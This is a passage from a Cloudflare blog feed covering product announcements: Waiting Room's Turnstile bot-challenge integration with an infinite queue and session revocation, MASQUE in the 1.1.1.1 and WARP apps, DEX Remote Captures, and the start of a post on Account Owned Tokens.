          </figure><p><sup><i>With an advanced waiting room, you can configure the type of Turnstile challenge from the Cloudflare dashboard and API.</i></sup></p><p>From the analytics we’ve gathered with the invisible Turnstile challenge on all basic waiting rooms, we’ve been able to determine that many large traffic spikes come from user agents that don’t even attempt to run the challenge, leaving it unsolved. In other words, we send the challenge widget in the HTML for the queuing page, but sometimes those challenges never get completed. By subtracting the number of times we see solved challenges from the total number of times we send challenges, we can get a count of requests that are likely from unsophisticated bots. These requests are reported to Waiting Room Analytics as “Likely Bots.” We’ve seen small businesses with low baseline traffic hit with tens of thousands of such requests (or more) in a short period of time. When a large influx of non-human traffic like this comes in, every visitor to the website ends up queued in a waiting room, not just the bots.</p><p>These bots could be any software that simply sends out HTTP requests. This data can help determine whether a traffic spike and subsequent queueing is coming from real human users, or a bunch of simple bots that don’t even bother to run JavaScript.</p><p>With the Turnstile integration, we are also catching sophisticated bots. While many of the bots we see don’t attempt to run the challenge, there are a few that do. Detecting these bots is more difficult than detecting simple bots that don’t run JavaScript. The Turnstile widget runs a series of checks against the browser to find evidence that a browser isn’t being operated by a human, and is instead being driven by something like <a href="https://www.selenium.dev/"><u>Selenium</u></a>. If Turnstile isn’t able to determine that the browser is being operated by a human, we count that as a failed challenge and report those users to Waiting Room Analytics as “Bots,” since we are quite confident that these users are not human.</p><p>About 1 in 20 “users” that run the challenge end up not passing. Just like the previously mentioned unsophisticated bots, these more sophisticated bots inflate the size of the queue, making it more difficult for real humans to make it through to your website.</p><p>The remaining 19 in 20 “users” that successfully pass the challenge are counted in Waiting Room Analytics as “Likely Humans.”</p><p>These new metrics related to Turnstile challenge outcomes are available in your Waiting Room Analytics dashboard and the <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>analytics GraphQL API</u></a>, so you can see the distribution of bot to human traffic in your waiting room. Once you know what your traffic looks like, the real question is: what can you do about it?</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1RVNiQAX4OE87L0H7ByyWb/b6eadb0f348d7ce711d138862b778117/image2.png" />
          </figure><p><sup><i>View the distribution of traffic and challenges issued in Waiting Room Analytics</i></sup></p>
    <div>
      <h3>New Infinite Queue feature</h3>
      <a href="#new-infinite-queue-feature">
        
      </a>
    </div>
    <p>Beyond logging your Turnstile challenge outcomes, Advanced Waiting Room customers have the option to select the Infinite Queue feature. With this feature, all traffic that fails the Turnstile challenge, such as a bot, will be sent to an Infinite Queue page. The Infinite Queue matches the normal queuing experience, prolonging the time it takes the bot to recognize they are being blocked and effectively consuming their resources. While the Infinite Queue will have the same look and feel as the Waiting Room page, the bot is not actually a part of the real queue. </p><p>With the infinite Queue enabled, all traffic will have to pass the challenge to enter the real queue. By blocking bots from joining the queue, we will reduce wait times for humans and prevent bots from using up server resources during a traffic spike.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/55Du8cmC3JfX4FrhL9KWIM/b273bb820290aad6997494551c0b49ac/image9.png" />
          </figure><p><sup><i>Enable the Infinite Queue option through the Cloudflare dashboard or API.</i></sup></p><p>Bots will be none the wiser, wasting their time and resources waiting in an infinite queue that will never get them to where they’re trying to go.</p><p>We keep track of the traffic hitting the infinite queue, counting the number of times they refresh their queuing page in Waiting Room Analytics. This appears as the “infinite queue refreshes” count in the analytics dash and GraphQL API. This metric gives you a good idea of the amount of time these bots have wasted trying to reach your website.</p>
    <div>
      <h3>How Waiting Room integrates with Turnstile</h3>
      <a href="#how-waiting-room-integrates-with-turnstile">
        
      </a>
    </div>
    <p>Turnstile is a powerful and versatile product that anyone, Cloudflare and others alike, can use to build systems to thwart bot traffic. Waiting Room integrates Turnstile the same as any other Turnstile user.</p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;title&gt;Waiting Room&lt;/title&gt;
	&lt;/head&gt;
	&lt;body&gt;
		&lt;h1&gt;You are currently in the queue.&lt;/h1&gt;
		{{#waitTimeKnown}}
			&lt;h2&gt;Your estimated wait time is {{waitTimeFormatted}}.&lt;/h2&gt;
		{{/waitTimeKnown}}
		{{^waitTimeKnown}}
			&lt;h2&gt;Your estimated wait time is unknown.&lt;/h2&gt;
		{{/waitTimeKnown}}
		{{#turnstile}}
			&lt;!-- for a managed (and potentially interactive) challenge, you may want to instruct the user to complete the challenge --&gt;
			&lt;p&gt;Please complete this challenge so we know you're a human:&lt;/p&gt;
			{{{turnstile}}} &lt;!-- include the turnstile widget --&gt;
		{{/turnstile}}
	&lt;/body&gt;
&lt;/html&gt;</code></pre>
            <p><sup><i>The Turnstile widget can be embedded in custom queuing page templates by including the </i></sup><code><sup><i>{{{turnstile}}}</i></sup></code><sup><i> variable.</i></sup></p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;title&gt;Waiting Room&lt;/title&gt;
	&lt;/head&gt;
	&lt;body&gt;
		{{#turnstile}}
			&lt;h1&gt;This website is currently using a waiting room.&lt;/h1&gt;
			&lt;p&gt;We use a Turnstile challenge to ensure you aren't waiting in line behind bots. Complete this challenge to enter the queue.&lt;/p&gt;
			{{{turnstile}}} &lt;!-- include the turnstile widget --&gt;
		{{/turnstile}}
		{{^turnstile}}
			&lt;h1&gt;You are currently in the queue.&lt;/h1&gt;
			{{#waitTimeKnown}}
				&lt;h2&gt;Your estimated wait time is {{waitTimeFormatted}}.&lt;/h2&gt;
			{{/waitTimeKnown}}
			{{^waitTimeKnown}}
				&lt;h2&gt;Your estimated wait time is unknown.&lt;/h2&gt;
			{{/waitTimeKnown}}
		{{/turnstile}}
	&lt;/body&gt;
&lt;/html&gt;</code></pre>
            <p><sup><i>When using Infinite Queue (especially with managed challenges which may be interactive), you may want to tell users they will not be in the queue until they complete the challenge.</i></sup></p><p>We embed a plain Turnstile challenge in the queuing page by passing the HTML to the queuing page template in a <code>turnstile</code> variable. The default queuing page template and any newly created custom templates include this variable already. If you have an existing custom HTML template and wish to enable the Turnstile integration, you will need to add <code>{{{turnstile}}}</code> somewhere in the template to tell Waiting Room where the widget should be placed. Waiting Room uses <a href="https://mustache.github.io/"><u>Mustache</u></a> templates, so including raw HTML within your template without escaping requires three curly braces instead of two.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1SLLpx14dpaGITEsSxgDqX/eecd16a85e531de0b5325df5535e8ae8/image1.png" />
          </figure><p><sup><i>A managed Turnstile challenge on the default Waiting Room queuing page template</i></sup></p><p>Once the challenge completes, fails, or times out, the page refreshes and passes the Turnstile token to <a href="https://blog.cloudflare.com/building-waiting-room-on-workers-and-durable-objects/"><u>Waiting Room’s worker</u></a>. Next, we check in with <a href="https://developers.cloudflare.com/turnstile/get-started/server-side-validation/"><u>Turnstile’s siteverify endpoint</u></a> to make sure the challenge was successful. From there, we report the outcome to the Waiting Room’s analytics and optionally send failed traffic (bots) to an infinite queue.</p><p>The infinite queue itself is designed to be as close to normal queuing as possible. When a bot is sent to the infinite queue, we issue it a cookie which looks like a normal waiting room cookie. Inside the cookie’s encryption though, we have a boolean flag that tells our worker to send the bot’s requests to the infinite queue. When we see that flag, we skip all the normal queuing logic and just render a queuing page.</p><p>That queuing page shows a fake estimated time remaining. It’s based on an asymptotic curve which appears to decrease linearly from the start. As time goes on, the curve gets flatter (and progress through the “queue” gets slower), so the estimated time remaining never quite reaches 0.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1J2U58CHRruMQ5LTkRo0fQ/8e7116eae5ba9fdecc6ac6cf404984ea/image5.png" />
          </figure><p><sup><i>This graph is an approximation of the time remaining (y-axis, minutes) that bots will see, compared to the amount of time they’ve waited in the infinite queue (x-axis, minutes).</i></sup></p><p>We reuse much of the same code for rendering the queuing page for the infinite queue and the normal queue. We do this to reduce the amount of signal bots may have that they are in the infinite queue rather than the normal queue.</p>
            <pre><code>let cookie
if (query['cf_wr_turnstile']) {
    const turnstileToken = query['cf_wr_turnstile']
    const tokenOk = await siteverify(turnstileToken)
    if (tokenOk) {
        analytics.turnstileSuccesses++
        cookie = newCookie()
    } else {
        analytics.turnstileFailures++
        cookie = { infiniteQueuing: true }
    }
    response.headers['Set-Cookie'] = encryptCookie(cookie)
}
if (!cookie) {
    cookie = decryptCookie(headers['Cookie'])
}
if (!cookie) {
    analytics.turnstileChallenges++
    return await queuingPage(await estimateTimeRemaining(), { turnstileChallenge: true })
} else if (cookie.infiniteQueuing) {
    analytics.infiniteQueueRequests++
    return await queuingPage(fakeTimeRemaining())
} else if (cookie.accepted) {
    return await sendToOrigin()
} else {
    // run Waiting Room's distributed queuing logic to check whether
    // this user has made it to the front of the queue, but only after
    // the user has completed a Turnstile challenge and isn't in the
    // fake infinite queue
    const { letThrough, timeRemaining } = calculateQueuing(cookie)
    if (letThrough) {
        cookie.accepted = true
        response.headers['Set-Cookie'] = encryptCookie(cookie)
        return await sendToOrigin()
    } else {
        return await queuingPage(timeRemaining)
    }
}</code></pre>
            <p><sup><i>Approximate psuedocode for how we handle incoming requests when infinite queue is enabled in the Waiting Room worker</i></sup></p><p>Thanks to the versatility of Turnstile, we only needed to rely on public Turnstile APIs to build this integration.</p><p>Adding Turnstile to Waiting Room is a proactive step in managing traffic that directly contributes to a smoother, faster experience for end users. Building on that efficiency, let’s dive into how you can add an additional layer of control to increase throughput and minimize wait times for your customers.</p>
    <div>
      <h3>Further improve wait times using session revocation</h3>
      <a href="#further-improve-wait-times-using-session-revocation">
        
      </a>
    </div>
    <p>We have talked extensively in a previous <a href="https://blog.cloudflare.com/building-waiting-room-on-workers-and-durable-objects/#how-does-the-waiting-room-work"><u>blog post</u></a> about how we queue users with respect to the current active users on the application and the defined limits, and, in the same <a href="https://blog.cloudflare.com/building-waiting-room-on-workers-and-durable-objects/#waiting-room-state"><u>blog post</u></a>, what state and calculations we use to determine the amount of total active users. Here is a quick summary for those who have not read that post:</p><p>When a user navigates to a page behind a waiting room, they receive a <a href="https://developers.cloudflare.com/waiting-room/reference/waiting-room-cookie/"><u>cookie</u></a> and are associated with a time period called a bucket. We use these buckets to track the number of users either waiting in the queue or accessing the application for that specific time period. Whenever a user makes a request, we move their session from their previous bucket to the latest bucket. Once a bucket is older than the configured session duration, we know that those user sessions are no longer valid (expired) and we can clean up those values. Thus, that user session expires, and new slots are opened for the next users to enter the application.</p><p>These buckets are aggregated at Cloudflare data centers and then globally via the internal state of the waiting room, which is structured as multiple <a href="https://en.wikipedia.org/wiki/Conflict-free_replicated_data_type"><u>CRDT</u></a> counters and registers. This allows us to merge the distributed state of the waiting room stored in multiple data centers as a single global state without conflicts.</p><p>To calculate the total active users on an application, we first merge the state from all data centers. Then, we sum the active users for all the buckets where a session can still be active.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/47yTgIvnWdYEcoOSoGPO8E/2989c82fcecd31ec22eb1384b0ff9e15/image7.png" />
          </figure><p>Because the Waiting Room runs per user request, we do not explicitly know when a user has stopped accessing the application, and instead we only stop receiving requests from them. So, we must consider their session active and as a contributor to the total active users count until it is older than the session duration limit. For waiting rooms that have a high session duration value configured, a user might navigate to the site for a small duration of time but contribute to the total active users count for up to the configured session duration even after they have stopped accessing the application. This can cause decreased throughput and longer wait times for users in the queue. </p>
    <div>
      <h3>Introducing Session Revocation </h3>
      <a href="#introducing-session-revocation">
        
      </a>
    </div>
    <p>With the Session Revocation feature, we now allow origins to return a command to the waiting room via an HTTP header (<code>Cf-Waiting-Room-Command</code>) to notify the Waiting Room to revoke the user session associated with the current response. This command removes the current user’s session and decreases the number of total active users for the bucket the session was last tracked in. This allows origins to terminate a user’s session early without needing to wait for the session to expire naturally.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2THxw5YatXjjZ4GxTP793n/0536e1d0eb3166c94ccfb6c7dce4148a/image4.png" />
          </figure><p>This can improve the throughput of waiting rooms in front of applications which have a dynamic user flow where the session duration is set very high to account for users who send infrequent requests to the application.</p><p>To set up session revocation in your waiting room, in the user session settings section in the configuration, check the “Allow session termination via origin commands” box. You must also configure your origin to return a session revocation HTTP header (<code>Cf-Waiting-Room-Command: revoke</code>) on the response when you want the session associated with that response to be revoked. For more information on how to do this, refer to our <a href="https://developers.cloudflare.com/waiting-room/how-to/control-user-session/#revoke-a-users-session-using-origin-commands"><u>developer documentation</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4XXqREJAf1FwrDAFSUovJs/53cb8bd410647046b05ad6b8b6f9f277/image6.png" />
          </figure><p><sup><i>Enable session revocation in the user session settings configuration</i></sup></p><p>In Waiting Room Analytics, you can view the number of sessions revoked per minute. The <code>sessionsRevoked</code><b> </b>field is the count of how many sessions were revoked in that minute in the <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>analytics GraphQL API</u></a>.  </p><p>In summary, Waiting Room Turnstile Integration and Session Revocation work together to enhance both security and user experience. The addition of a Turnstile challenge in the Waiting Room helps identify and block bots, ensuring that legitimate users don’t face unnecessary delays. Meanwhile, the Session Revocation feature optimizes resource usage by allowing you to end user sessions after key actions, like completing a purchase, freeing up space for other users. </p><p>Together, these features successfully increase throughput and reduce wait times, providing a faster, more efficient experience for your customers. For more information on these features, <a href="https://developers.cloudflare.com/waiting-room"><u>check out our developer documentation</u></a>. </p> ]]></content:encoded>
            <category><![CDATA[Waiting Room]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">48d5TNR7SLaks6NJ9LGb77</guid>
            <dc:creator>Rachel Wyatt </dc:creator>
            <dc:creator>Piper McCorkle</dc:creator>
            <dc:creator>Brad Swenson</dc:creator>
        </item>
        <item>
            <title><![CDATA[What’s new in Cloudflare: MASQUE now powers 1.1.1.1 & WARP apps, DEX now generally available with Remote Captures]]></title>
            <link>https://blog.cloudflare.com/masque-now-powers-1-1-1-1-and-warp-apps-dex-available-with-remote-captures/</link>
            <pubDate>Fri, 27 Dec 2024 14:00:00 GMT</pubDate>
            <description><![CDATA[ This roundup blog post shares the latest new features and capabilities at Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, we are constantly innovating and launching new features and capabilities across our product portfolio. Today’s roundup blog post shares two exciting updates across our platform: our cross-platform <a href="https://www.cloudflare.com/en-gb/learning/dns/what-is-1.1.1.1/"><u>1.1.1.1</u></a> &amp; <a href="https://developers.cloudflare.com/warp-client/"><u>WARP</u></a> applications (consumer) and device agents (Zero Trust)  now use <a href="https://blog.cloudflare.com/masque-building-a-new-protocol-into-cloudflare-warp/"><u>MASQUE</u></a>, a cutting-edge <a href="https://www.cloudflare.com/en-gb/learning/performance/what-is-http3/"><u>HTTP/3</u></a>-based protocol, to secure your Internet connection. Additionally, DEX is now available for general availability. </p>
    <div>
      <h2>Faster and more stable: our 1.1.1.1 &amp; WARP apps now use MASQUE by default</h2>
      <a href="#faster-and-more-stable-our-1-1-1-1-warp-apps-now-use-masque-by-default">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6CghJvmC5DBnhKLM36MY3O/ecf722a9d9b5a4e4a048afea06237749/image1.png" />
          </figure><p>We’re excited to announce that as of today, our cross-platform <a href="https://www.cloudflare.com/en-gb/learning/dns/what-is-1.1.1.1/"><u>1.1.1.1</u></a> &amp; <a href="https://developers.cloudflare.com/warp-client/"><u>WARP</u></a> apps now use <a href="https://blog.cloudflare.com/masque-building-a-new-protocol-into-cloudflare-warp/"><u>MASQUE</u></a>, a cutting-edge <a href="https://www.cloudflare.com/en-gb/learning/performance/what-is-http3/"><u>HTTP/3</u></a>-based protocol, to secure your Internet connection.</p><p>As a reminder, our 1.1.1.1 &amp; WARP apps have two main functions: send all DNS queries through 1.1.1.1, our privacy-preserving DNS resolver, and protect your device’s network traffic via WARP by creating a private and encrypted tunnel to the resources you’re accessing, preventing unwanted third parties or public Wi-Fi networks from snooping on your traffic.</p><p>There are many ways to encrypt and proxy Internet traffic — you may have heard of a few, such as IPSec, WireGuard, or OpenVPN. There are many tradeoffs we considered when choosing a protocol, but we believe MASQUE is the future of fast, secure, and stable Internet proxying, it aligns with our belief in building on top of open Internet standards, and we’ve deployed it successfully at scale for customers like <a href="https://blog.cloudflare.com/icloud-private-relay/"><u>iCloud Private Relay</u></a> and <a href="https://blog.cloudflare.com/cloudflare-now-powering-microsoft-edge-secure-network/"><u>Microsoft Edge Secure Network</u></a>.</p>
    <div>
      <h3>Why MASQUE?</h3>
      <a href="#why-masque">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/masque-building-a-new-protocol-into-cloudflare-warp/"><b><u>MASQUE</u></b></a> is a modern framework for proxying traffic that allows a variety of application protocols, including HTTP/3, to utilize QUIC as their transport mechanism. That’s a lot of acronyms, so let's make sure those are clear. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6XkQ3rF8oo8JaG0Iujskia/6383b0c0bce36a94298960c163495843/image4.png" />
          </figure><p><a href="https://blog.cloudflare.com/quic-version-1-is-live-on-cloudflare/"><b><u>QUIC</u></b></a> is a general-purpose transport protocol and <a href="https://www.rfc-editor.org/rfc/rfc9000.html"><u>Internet standard</u></a> that operates on top of UDP (instead of TCP), is encrypted by default, and solves several performance issues that plagued its predecessors. <a href="https://www.cloudflare.com/en-gb/learning/performance/what-is-http3/"><b><u>HTTP/3</u></b></a><b> </b>is the latest version of the HTTP protocol, defining the application-layer protocol that runs on top of QUIC as its transport mechanism. MASQUE is a set of mechanisms for tunneling traffic over HTTP. It extends the existing HTTP CONNECT model, to allow tunneling UDP and IP traffic. This is especially efficient when combined with the QUIC’s <a href="https://datatracker.ietf.org/doc/html/rfc9221"><u>unreliable datagram extension</u></a>. </p><p>For example, we can use MASQUE’s <a href="https://www.rfc-editor.org/rfc/rfc9484.html"><u>CONNECT-IP method</u></a> to establish a tunnel that can send multiple concurrent requests over a single QUIC connection:</p>
            <pre><code>HEADERS
:method = CONNECT
:protocol = connect-ip
:scheme = https
:path = /.well-known/masque/ip/*/*/
:authority = example.org
capsule-protocol = ?1</code></pre>
            <p>The benefit these protocols have for the quality and security of everyone’s Internet browsing experience is real. Earlier transport protocols were built before the advent of smartphones and mobile networks, so QUIC was designed to support a mobile world, maintaining connections even in poorly connected networks, and minimizing disruptions as people switch rapidly between networks as they move through their day. Leveraging HTTP/3 as the application layer means that MASQUE is more like “normal” HTTP traffic on the Internet, meaning that it is easier to support, is compatible with existing firewall and security rules, and that it supports cryptographic agility (i.e. support for <a href="https://blog.cloudflare.com/post-quantum-for-all/"><u>post-quantum crypto</u></a>), making this traffic more secure and resilient in the long term.</p>
    <div>
      <h3>Get started now </h3>
      <a href="#get-started-now">
        
      </a>
    </div>
    <p>All new installations of our 1.1.1.1 &amp; WARP apps support MASQUE, including iOS, Android, macOS, Windows, and Linux, and we’ve started to roll it out as the preferred protocol over WireGuard. <a href="https://developers.cloudflare.com/warp-client/get-started/"><u>On mobile</u></a>, to check if your connection is already secured over MASQUE, or change your device’s default option, you can toggle this setting via <i>Advanced &gt; Connection options &gt; Tunnel protocol:</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3c7lAh7C5huXDUYt4v7B7w/a089967f8d9d668b2ded321f40b35cf4/Screenshot_2024-12-23_at_18.26.20.png" />
          </figure><p><sup><i>Protocol connection options shown here on the iOS app</i></sup></p><p>We offer the following options: </p><ul><li><p><b>Auto</b>: this allows the app to choose the protocol.</p></li><li><p><b>MASQUE</b>: always use MASQUE to secure your connection.</p></li><li><p><b>WireGuard</b>: always use WireGuard to secure your connection.</p></li></ul><p>On <a href="https://developers.cloudflare.com/warp-client/get-started/linux/"><u>desktop</u></a> versions, you can switch the protocol by using the WARP command-line interface. For example:</p>
            <pre><code>warp-cli tunnel protocol set WireGuard
warp-cli tunnel protocol set MASQUE</code></pre>
            <p>With this rollout, we're excited to see MASQUE deliver increased performance and stability to millions of users. Download <a href="https://one.one.one.one/"><u>one of the WARP apps</u></a> today!</p>
    <div>
      <h2>DEX now Generally Available: Announcing detailed device visibility with DEX Remote Captures</h2>
      <a href="#dex-now-generally-available-announcing-detailed-device-visibility-with-dex-remote-captures">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RkuqjgXZh8tmoj4W1narK/baaf61dcde00bbfa4cef71e5dbd2cc23/image2.png" />
          </figure><p><i>Following the successful beta launch of Digital Experience Monitoring (DEX), we are thrilled to announce the general availability of DEX, along with new Remote Captures functionality.</i></p><p>In today's hyper distributed environment, user experience is paramount. Recurring performance problems can lead to decreased user satisfaction, lost productivity, and damaged brand reputation.  <a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring (DEX)</u></a> offers a comprehensive solution to these challenges. Previous blog posts have discussed the solution and its capabilities. (<a href="https://blog.cloudflare.com/introducing-digital-experience-monitoring/"><i><u>Introducing Digital Experience Monitoring</u></i></a><i>, </i><a href="https://blog.cloudflare.com/digital-experience-monitoring-beta/"><i><u>Understanding end user-connectivity and performance with Digital Experience Monitoring, now available in beta</u></i></a><i>, </i><a href="https://blog.cloudflare.com/tag/dex"><i><u>What's new in Cloudflare One: Digital Experience monitoring notifications</u></i></a>)</p>
    <div>
      <h3>Introducing Remote Captures: PCAP and WARP Diag</h3>
      <a href="#introducing-remote-captures-pcap-and-warp-diag">
        
      </a>
    </div>
    <p>Imagine this: an end user is frustrated with a slow application, and your IT team is struggling to pinpoint the root cause. Traditionally, troubleshooting such issues involved contacting the end user and asking them to manually collect and share network traffic data. This process is time-consuming, prone to errors, and often disruptive to the end user's workflow.</p><p>Building upon the capabilities of DEX, we are excited to introduce Remote Captures, a powerful new feature that empowers IT admins to gain unprecedented visibility into end-user devices and network performance. DEX now introduces Remote Captures, a powerful new feature that empowers IT admins to remotely initiate network <a href="https://en.wikipedia.org/wiki/Pcap"><u>packet captures (PCAP)</u></a> and <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/troubleshooting/warp-logs/"><u>WARP Diag logs</u></a> directly from your end users’ devices and capture diagnostic information automatically from our device client. This streamlined approach accelerates troubleshooting, reduces the burden on end users, and provides valuable insights into network performance and security.</p>
    <div>
      <h3>Why Remote Captures?</h3>
      <a href="#why-remote-captures">
        
      </a>
    </div>
    <p>Remote Captures offer several key advantages. By analyzing detailed network traffic, IT teams can quickly pinpoint the root cause of network issues. Furthermore, granular network data empowers security teams to proactively detect and investigate potential threats. Finally, by identifying bottlenecks and latency issues, Remote Captures enable organizations to optimize network performance for a smoother user experience.</p>
    <div>
      <h3>How Remote Captures work</h3>
      <a href="#how-remote-captures-work">
        
      </a>
    </div>
    <p>Initiating a Remote Capture is straightforward. First, select the specific device you wish to troubleshoot. Then, with a few simple clicks, start capturing network traffic and/or WARP Diag data. Once the capture is complete, download the captured data and utilize your preferred tools for in-depth analysis.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5NWQAhlUK8OQvuydQV0lb7/d93f6792e897120aa5e2f837a6ec7786/image3.png" />
          </figure>
    <div>
      <h3>Get started today</h3>
      <a href="#get-started-today">
        
      </a>
    </div>
    <p>DEX Remote Captures are now available for Cloudflare One customers. They can be configured by going to <a href="https://dash.cloudflare.com/"><u>Cloudflare Dashboard</u></a> &gt;  Zero Trust &gt; DEX &gt; Remote Captures, and then selecting the device you wish to collect from. For more information, refer to <a href="https://developers.cloudflare.com/cloudflare-one/insights/dex/remote-captures/"><u>Remote captures</u></a>. This new capability highlights just one of the many ways our unified SASE platform helps organizations find and fix security issues across SaaS applications. <a href="https://dash.cloudflare.com/sign-up/teams"><u>Try it out now</u></a> using our free tier to get started.</p>
    <div>
      <h2>Never miss an update </h2>
      <a href="#never-miss-an-update">
        
      </a>
    </div>
    <p>We hope you enjoy reading our roundup blog posts as we continue to build and innovate. Stay tuned to the <a href="https://blog.cloudflare.com/"><u>Cloudflare Blog</u></a> for the latest news and updates.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[DEX]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[MASQUE]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">1zc4C9M6VIkj5TrfugGxum</guid>
            <dc:creator>Mari Galicer</dc:creator>
            <dc:creator>Guy Nir</dc:creator>
        </item>
        <item>
            <title><![CDATA[What’s new in Cloudflare: Account Owned Tokens and Zaraz Automated Actions]]></title>
            <link>https://blog.cloudflare.com/account-owned-tokens-automated-actions-zaraz/</link>
            <pubDate>Thu, 14 Nov 2024 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare customers can now create Account Owned Tokens , allowing more flexibility around access control for their Cloudflare services. Additionally, Zaraz Automation Actions streamlines event tracking and third-party tool integration.  ]]></description>
            <content:encoded><![CDATA[ <p>In October 2024, we started publishing roundup blog posts to share the latest features and updates from our teams. Today, we are announcing general availability for Account Owned Tokens, which allow organizations to improve access control for their Cloudflare services. Additionally, we are launching Zaraz Automated Actions, which is a new feature designed to streamline event tracking and tool integration when setting up third-party tools. By automating common actions like pageviews, custom events, and e-commerce tracking, it removes the need for manual configurations.</p>
    <div>
      <h2>Improving access control for Cloudflare services with Account Owned Tokens</h2>
      <a href="#improving-access-control-for-cloudflare-services-with-account-owned-tokens">
        
      </a>
    </div>
    <p>Cloudflare is critical infrastructure for the Internet, and we understand that many of the organizations that build on Cloudflare rely on apps and integrations outside the platform to make their lives easier. In order to allow access to Cloudflare resources, these apps and integrations interact with Cloudflare via our API, enabled by access tokens and API keys. Today, the API Access Tokens and API keys on the Cloudflare platform are owned by individual users, which can lead to some difficulty representing services, and adds an additional dependency on managing users alongside token permissions.</p>
    <div>
      <h3>What’s new about Account Owned Tokens</h3>
      <a href="#whats-new-about-account-owned-tokens">
        
      </a>
    </div>
    <p>First, a little explanation because the terms can be a little confusing. On Cloudflare, we have both Users and Accounts, and they mean different things, but sometimes look similar. Users are people, and they sign in with an email address. Accounts are not people, they’re the top-level bucket we use to organize all the resources you use on Cloudflare. Accounts can have many users, and that’s how we enable collaboration. If you use Cloudflare for your personal projects, both your User and Account might have your email address as the name, but if you use Cloudflare as a company, the difference is more apparent because your user is “<a><u>joe.smith@example.com</u></a>” and the account might be “Example Company”. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tcNkxDjYz9jAXnfV0bPON/920a9dade7145de2adee21afa43d786e/image13.jpg" />
          </figure><p>Account Owned Tokens are not confined by the permissions of the creating user (e.g. a user can never make a token that can edit a field that they otherwise couldn’t edit themselves) and are scoped to the account they are owned by. This means that instead of creating a token belonging to the user “<a><u>joe.smith@example.com</u></a>”, you can now create a token belonging to the account “Example Company”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ibh4sT2wgVLVTgqgv2rtO/eb972a5b1c5fa0f70471631430a8ff91/image8.jpg" />
          </figure><p>The ability to make these tokens, owned by the account instead of the user, allows for more flexibility to represent what the access should be used for.</p><p>Prior to Account Owned Tokens, customers would have to have a user (<a><u>joe.smith@example.com</u></a>) create a token to pull a list of Cloudflare zones for their account and ensure their security settings are set correctly as part of a compliance workflow, for example. All of the actions this compliance workflow does are now attributed to joe.smith, and if joe.smith leaves the company and his permissions are revoked, the compliance workflow fails.</p><p>With this new release, an Account Owned Token could be created, named “compliance workflow”, with permissions to do this operation independently of <a><u>joe.smith@example.com</u></a>. All actions this token does are attributable to “compliance workflow”. This token is visible and manageable by all the superadmins on your Cloudflare account. If joe.smith leaves the company, the access remains independent of that user, and all super administrators on the account moving forward can still see, edit, roll, and delete the token as needed.</p><p>Any long-running services or programs can be represented by these types of tokens, be made visible (and manageable) by all super administrators in your Cloudflare account, and truly represent the service, instead of the users managing the service. Audit logs moving forward will log that a given token was used, and user access can be kept to a minimum.</p>
    <div>
      <h3>Getting started</h3>
      <a href="#getting-started">
        
      </a>
    </div>
    <p>Account Owned Tokens can be found on the new “API Tokens” tab under the “Manage Account” section of your Cloudflare dashboard, and any Super Administrators on your account have the capability to create, edit, roll, and delete these tokens. The API is the same, but at a new <code>/account/&lt;accountId&gt;/tokens</code> endpoint.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/uZFVUp1RRP1NgZli9RAYN/5e2b90bea51b7b45bb25478120fd9024/Screenshot_2024-11-13_at_20.14.43.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1kiUi4lsJESJqr9HhgCS92/b4b0a3e955742346a5c945601fff4885/image3.png" />
          </figure>
    <div>
      <h3>Why/where should I use Account Owned Tokens?</h3>
      <a href="#why-where-should-i-use-account-owned-tokens">
        
      </a>
    </div>
    <p>There are a few places we would recommend replacing your User Owned Tokens with Account Owned Tokens:</p><p>1. <b>Long-running services that are managed by multiple people:</b> When multiple users all need to manage the same service, Account Owned Tokens can remove the bottleneck of requiring a single person to be responsible for all the edits, rotations, and deletions of the tokens. In addition, this guards against any user lifecycle events affecting the service. If the employee that owns the token for your service leaves the company, the service’s token will no longer be based on their permissions.</p><p>2.<b> Cloudflare accounts running any services that need attestable access records beyond user membership:</b> By restricting all of your users from being able to access the API, and consolidating all usable tokens to a single list at the account level, you can ensure that a complete list of all API access can be found in a single place on the dashboard, under “Account API Tokens”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2qtssh6bef5Ne6kugqUUnc/af11e3db733f4f38188988ac42034c26/image9.png" />
